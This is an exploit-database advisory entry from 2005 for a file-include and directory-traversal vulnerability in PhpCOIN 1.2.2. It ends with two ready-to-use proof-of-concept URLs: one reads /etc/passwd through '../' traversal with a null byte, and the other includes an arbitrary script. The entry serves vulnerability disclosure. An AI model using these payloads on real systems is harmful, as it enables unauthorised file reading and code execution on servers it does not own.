PHPCOIN 1.2.2 - includesdb.php?$_CCFG[_PKG_PATH_DBSE] Traversal Arbitrary File Access

2005-12-13T00:00:00
ID EXPLOITPACK:876E037BDD72A5BE394CF5031A1FA878
Type exploitpack
Reporter retrogod@aliceposta.it
Modified 2005-12-13T00:00:00

Description

PHPCOIN 1.2.2 - includesdb.php?$_CCFG[_PKG_PATH_DBSE] Traversal Arbitrary File Access

                                        
                                            source: https://www.securityfocus.com/bid/15831/info
 
PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
 
An attacker can exploit this issue to include arbitrary remote PHP code and execute it in the context of the Web server process. The attacker can also exploit this issue to include arbitrary local files through the use of directory traversal strings '../'.
 
Successful exploitation may lead to a compromise of the underlying system; other attacks are also possible. 

http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00